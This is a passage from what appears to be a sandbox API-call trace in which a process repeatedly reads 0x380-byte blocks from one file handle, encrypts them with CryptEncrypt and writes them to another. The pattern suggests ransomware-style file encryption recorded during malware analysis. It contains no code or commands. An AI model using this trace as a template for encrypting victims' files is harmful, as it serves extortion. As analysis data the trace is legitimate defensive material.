lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.636] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.636] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.637] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.637] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.637] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.637] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.637] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.638] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.638] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.638] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.638] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.639] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.639] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.640] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.640] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.640] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.640] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.640] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.640] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.641] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.641] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.642] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.642] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.642] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.642] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.643] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.643] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.643] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.643] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.643] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.643] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.644] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.644] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.644] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 